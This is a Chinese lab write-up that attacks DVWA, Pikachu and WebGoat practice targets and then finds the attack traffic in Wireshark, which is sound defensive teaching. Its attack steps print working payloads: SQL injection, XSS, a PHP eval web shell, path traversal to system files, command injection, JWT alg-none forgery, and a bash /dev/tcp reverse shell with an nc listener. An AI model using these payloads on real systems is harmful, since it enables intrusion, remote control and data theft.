web漏洞的攻击及抓取攻击流量

以dvwa靶场为例,使用wireshark抓取攻击流量,并定位关键字段

SQL注入

攻击

在sql注入攻击

1' and 1=2 union select version(),2#

image-20231208173546486

流量特征

在数据包中可以清晰的查看源IP和目的IP

在Wireshark选中Ethernet0网卡

  • 点击Submit,进行抓包

image-20231208174703154

  • 利用union select关键字开始抓包
  • 并在Wireshark中停止抓包

image-20231208175935863

  • 抓包成功

  • 查看目的ip地址的流量

ip.dst==192.168.63.138

image-20231208180307473

  • 成功找到union select关键字

image-20231208180525316

XSS

攻击

  • 注入XSS漏洞
<ScRiPt>alert(/xss/)</script>

image-20231208181831494

  • 注入成功

image-20231208182041059

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 使用wireshark抓取数据包
  • 并查找关键字script

image-20231208190918157

  • 成功找到script关键字

image-20231208191031126

文件上传

攻击

上传一句话木马文件

<?php @eval($_POST[777]);?>

image-20231208192850808

上传成功

image-20231208193021019

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 使用wireshark抓取数据包
  • 并查找后缀为.php的文件

image-20231208194525270

  • 成功找到1.php关键字
  • 可以看到1.php的内容

image-20231208194923347

文件包含

攻击

将url中page后的值改为file../../../../phpinfo.php

image-20231208201025718

image-20231208200938629

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 使用wireshark抓取数据包
  • 查找url的值为file../../../../phpinfo.php

image-20231208202214395

  • 查看目的ip地址的流量
ip.dst==192.168.63.141&&http

image-20231208201954039

  • 成功找到关键字file../../../../phpinfo.php

image-20231208202054120

文件读取

攻击

image-20231208204058865

将url中的值改为

file/../../../../../../../../../../windows\system32\drivers\etc\hosts

image-20231208204341899

读取成功

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 使用wireshark抓取数据包
  • 查找url的值为file../../../../../../../windows\system32\drivers\etc\hosts

image-20231208205305228

  • 查看目的ip地址的流量
ip.dst==192.168.63.141&&http

image-20231208205627801

成功找到关键字file../../../../../../../windows\system32\drivers\etc\hosts

image-20231208205745569

暴力破解

攻击

  • 输入用户名密码

image-20231208215819863

  • 用burp抓包

image-20231208220418418

爆破成功

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 利用burp的post进行抓取数据包

image-20231208221302809

  • 使用wireshark抓取数据包
  • 查看目的ip地址的流量
ip.dst==192.168.63.139&&http

image-20231208221701609

成功找到数据包的关键字

image-20231208221813168

命令执行

攻击

注入命令

ping 127.0.0.1 | whoami

image-20231208223349398

注入成功

image-20231208223424048

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 点击Submit,进行抓包

image-20231208223737950

  • 查看目的ip地址的流量
ip.dst==192.168.63.139

image-20231208224037023

成功找到数据包的关键字

image-20231208224112232

SSRF

以pikachu靶场为例

攻击

更改url后的值

image-20231208211033151

更改为http://www.baidu.com

image-20231208211215362

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 使用wireshark抓取数据包
  • 查找url的值为http://www.baidu.com

image-20231208211443071

成功找到数据包中的关键字

image-20231208211531348

shiro反序列化

攻击

利用kali的IP开始攻击

image-20231208115556121

成功找到cc链

image-20231208115725468

尝试命令执行

image-20231208120017735

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 点击Ethernet0
  • 执行

image-20231208160148600

  • 开始抓取流量

  • 并在Wireshark中停止抓包

image-20231208160727542

查看目的ip地址的流量

ip.dst==192.168.63.129

image-20231208160844980

  • 双击查看

  • 看到shiro反序列化的关键字rememberme=

image-20231208161147196

jwt

以WebGoat第4关靶场为例

攻击

首先登录Tom用户

image-20231207195218312

选择一个并开始投票,发现可以一致投票

image-20231207195800014

点击删除,提示只有admin用户才能清空

image-20231207200109571

利用bp开始抓包

image-20231207200623432

右击发送到Repeater

image-20231207200831802

将cookie的值利用进行JWT解码

image-20231207201039860

image-20231207201357130

利用base64编码,将HS512改为nonefalse改为true

image-20231207201730882

image-20231207202029275

分别将修改后的base64编码放在Encoded中

image-20231207202151133

将HEADER和PAYLOAD的Encoded放在bp的cookie中

image-20231207202340734

提示已经成功完成任务

image-20231207202427904

回到页面查看,删除成功

image-20231207202653914

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 利用burp的post进行抓取数据包

image-20231208214815104

  • 使用wireshark抓取数据包
  • 查看目的ip地址的流量
ip.dst==192.168.63.129&&http

image-20231208215030666

成功找到数据包中的关键字

image-20231208215150445

反弹shell

前提:

准备两台虚拟机(kali、linux)

攻击

首先是kali开启监听

nc -lvvp 5555

image-20231209110753977

Linux连接kali

bash -i >& /dev/tcp/192.168.63.129/5555 0>&1
          或
bash -c "bash -i >& /dev/tcp/192.168.63.129/5555 0>&1"
#bash -i >& /dev/tcp/攻击机IP/攻击机端口 0>&1

image-20231209111032892

监听成功

image-20231209111102278

流量特征

在数据包中可以清晰的查看源IP和目的IP

  • 使用wireshark抓取数据包中的cat /etc/passwd

image-20231209111703129

  • 查看目的ip地址的流量
ip.dst==192.168.63.129&&tcp
  • 成功抓到tcp数据流中的关键字

image-20231209112423626

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mfbz.cn/a/232639.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

【STM32】TIM定时器编码器

1 编码器接口简介 Encoder Interface 编码器接口 编码器接口可接收增量&#xff08;正交&#xff09;编码器的信号&#xff0c;根据编码器旋转产生的正交信号脉冲&#xff0c;自动控制CNT自增或自减&#xff0c;从而指示编码器的位置、旋转方向和旋转速度 接收正交信号&#…

达梦数据库dm8守护集群部署手册

环境说明 操作系统&#xff1a;liunx-centos7.6 服务器&#xff1a;3台虚拟机&#xff08;主备数据库各一台&#xff0c;监视器一台(可选)&#xff09; 达梦数据库版本&#xff1a;达梦V8 一、安装前准备工作 参考达梦官方文档&#xff1a;https://eco.dameng.com/documen…

记一次堆内外内存问题的排查和优化

为优化淘宝带宽成本&#xff0c;我们在网关 SDK&#xff08;Java&#xff09;统一使用 ZSTD 替代 GZIP 压缩以获取更高的压缩比&#xff0c;从而得到更小的响应包。具体实现采用官方推荐的 zstd-jni 库。zstd-jni 会调用 zstd 的 c 库。 背景 在性能压测和优化过程中&#xff0…

基于 Gin 的 HTTP 中间人代理 Demo

前面实现的代理对于 HTTPS 流量是进行盲转的&#xff0c;也就是说直接在 TCP 连接上传输 TLS 流量&#xff0c;但是我们无法查看或者修改它的内容。当然了&#xff0c;通常来说这也是不必要的。不过对于某些场景下还是有必要的&#xff0c;例如使用 Fiddler 进行抓包或者监控其…

Git 五分钟教程速度入门

Git 五分钟教程速度入门 分类 编程技术 许多人认为 Git 太混乱&#xff0c;或认为它是一种复杂的版本控制系统&#xff0c;其实不然&#xff0c;这篇文章有助于大家快速上手使用 Git。 入门 使用Git前&#xff0c;需要先建立一个仓库(repository)。您可以使用一个已经存在的…

HLS实现图像膨胀和腐蚀运算--xf_dilation和xf_erosion

一、图像膨胀和图像腐蚀概念 我们先定义&#xff0c;需要处理的图片为二值化图像A。图片的背景色为黑色&#xff0c;即像素值为0。图片的目标色为白色&#xff0c;即像素值为1。 再定义一个结构元S&#xff0c;结构元范围内所有的像素为白色&#xff0c;像素值为1。 1、图像的…

自下而上-存储全栈(TiDB/RockDB/SPDK/fuse/ceph/NVMe/ext4)存储技术专家成长路线

数字化时代的到来带来了大规模数据的产生&#xff0c;各行各业都面临着数据爆炸的挑战。 随着云计算、物联网、人工智能等新兴技术的发展&#xff0c;对存储技术的需求也越来越多样化。不同应用场景对存储的容量、性能、可靠性和成本等方面都有不同的要求。具备存储技术知识和技…

HarmonyOS应用开发-闪屏启动页

这是鸿蒙开发者网站的一个应用《溪村小镇》示例代码&#xff0c;把闪屏启动页单拿出来&#xff0c;分析一下代码。 一、先上效果图 这是应用打开时的一个启动页&#xff0c;启动页会根据三个时间段&#xff08;白天、傍晚、晚上&#xff09;来分别展示溪村小镇不同的景色。 二…

RocketMQ-RocketMQ高性能核心原理与源码剖析(下)

融汇贯通阶段 ​ 开始梳理一些比较完整&#xff0c;比较复杂的完整业务线。 8、消息持久化设计 1、RocketMQ的持久化文件结构 ​ 消息持久化也就是将内存中的消息写入到本地磁盘的过程。而磁盘IO操作通常是一个很耗性能&#xff0c;很慢的操作&#xff0c;所以&#xff0c;…

MyBatis--07--启动过程分析、SqlSession安全问题、拦截器

提示&#xff1a;文章写完后&#xff0c;目录可以自动生成&#xff0c;如何生成可参考右边的帮助文档 文章目录 谈谈MyBatis的启动过程具体的操作过程如下&#xff1a;实现测试类,并测试SqlSessionFactorySqlSession SqlSession有数据安全问题?在MyBatis中&#xff0c;SqlSess…

App备案、ios备案Bundle ID查询、公钥信息、SHA-1值

App备案、ios备案Bundle ID查询、公钥信息、SHA-1值 Bundle ID这个就不说了&#xff0c;都知道是啥&#xff0c;主要说公钥信息和SHA-1值的获取 打开钥匙串访问&#xff0c;找到当前需要备案App的dis证书&#xff0c;如下&#xff1a; #####右键点击显示简介 #####可以看…

ThinkPHP生活用品商城系统

有需要请加文章底部Q哦 可远程调试 ThinkPHP生活用品商城系统 一 介绍 此生活用品商城系统基于ThinkPHP框架开发&#xff0c;数据库mysql&#xff0c;前端bootstrap。系统分为用户和管理员。(附带配套设计文档) 技术栈&#xff1a;ThinkPHPmysqlbootstrapphpstudyvscode 二 …

小米手机锁屏时间设置为永不休眠_手机不息屏_保持亮屏

环境&#xff1a;打开手机自带的锁屏时间设置发现没有 永不息屏的选项 原因&#xff1a;采用了三星OLED屏幕&#xff0c;所以根据OLED屏幕特性&#xff0c;这个是为了防止烧屏而特意设计的。非OLED机型支持设置“永不” 解决方案1&#xff1a;原生系统是支持永不锁屏的&#…

【自定义Source、Sink】Flink自定义Source、Sink对redis进行读写操作

使用ParameterTool读取配置文件 Flink读取参数的对象 Commons-cli&#xff1a; Apache提供的&#xff0c;需要引入依赖ParameterTool&#xff1a;Flink内置 ParameterTool 比 Commons-cli 使用上简便&#xff1b; ParameterTool能避免Jar包的依赖冲突 建议使用第二种 使用Par…

STL(七)(map篇)

### 这里重点学习map ### 在实际做题过程中,multimap几乎用不到### unordered_map拥有极好的平均时间复杂度和极差的最坏时间复杂度,所以他的时间复杂度是不稳定的,unordered_map一般用不到,要做一个了解 1.map map是一种关联容器,用于存储一组键值对(key-value pairs),其中每…

鸿蒙开发组件之Slider

一、Slider控件是鸿蒙开发中的滑动条组建&#xff0c;初始化方式 Slider({min:0, //最小值max:100,//最大值value:30,//默认值step:10,//步长&#xff0c;每次滑动的差值style:SliderStyle.OutSet, //滑块的样式&#xff0c;默认outsetdirection:Axis.Horizontal, //水平方式的…

Transformer 简介

Transformer 是 Google 在 2017 年底发表的论文 Attention Is All You Need 中所提出的 seq2seq 模型。Transformer 模型的核心是 Self-Attention 机制&#xff0c;能够处理输入序列中的每个元素&#xff0c;并能计算其与序列中其他元素的交互关系的方法&#xff0c;从而能够更…

【自定义Source、Sink】Flink自定义Source、Sink对ClickHouse进行读和批量写操作

ClickHouse官网文档 Flink 读取 ClickHouse 数据两种驱动 ClickHouse 官方提供Clickhouse JDBC.【建议使用】第3方提供的Clickhouse JDBC. ru.yandex.clickhouse.ClickHouseDriver ru.yandex.clickhouse.ClickHouseDriver.现在是没有维护 ClickHouse 官方提供Clickhouse JDBC…

【小沐学Python】Python实现语音识别(SpeechRecognition)

文章目录 1、简介2、安装和测试2.1 安装python2.2 安装SpeechRecognition2.3 安装pyaudio2.4 安装pocketsphinx&#xff08;offline&#xff09;2.5 安装Vosk &#xff08;offline&#xff09;2.6 安装Whisper&#xff08;offline&#xff09; 3 测试3.1 命令3.2 fastapi3.3 go…

【数据结构】——排序篇(上)

前言&#xff1a;前面我们已经学过了许许多多的排序方法&#xff0c;如冒泡排序&#xff0c;选择排序&#xff0c;堆排序等等&#xff0c;那么我们就来将排序的方法总结一下。 我们的排序方法包括以下几种&#xff0c;而快速排序和归并排序我们后面进行详细的讲解。 直接插入…
最新文章